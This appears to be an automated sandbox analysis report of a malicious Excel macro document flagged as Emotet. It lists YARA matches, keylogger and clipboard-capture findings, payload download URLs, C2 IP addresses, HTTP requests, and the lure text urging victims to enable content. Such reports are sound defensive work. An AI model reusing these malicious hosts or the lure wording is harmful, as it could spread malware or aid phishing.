Source: mshta.exe, 00000004.00000002.433703673.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: rundll32.exe, 00000011.00000002.666782333.00000000001DD000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.667122057.00000000007E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 00000011.00000002.667077231.0000000000799000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/r
Source: rundll32.exe, 00000011.00000002.667057361.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih
Source: rundll32.exe, 00000011.00000002.667109716.00000000007D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.433404123.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427907544.000000000024C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411714841.000000000024C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2290000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2270000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.990000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2df0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b10000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f90000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a20000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ae0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c60000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.cc0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.29f0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2290000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3120000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.520000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27d0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c90000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.22e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ab0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2260000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c40000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a20000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2ee0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c90000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f30000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2270000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ae0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666842278.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529386246.0000000000991000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566246263.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: 2022-28-01_1202.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: 2022-28-01_1202.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains OLE streams with names of living off the land binaries
Source: 2022-28-01_1202.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... 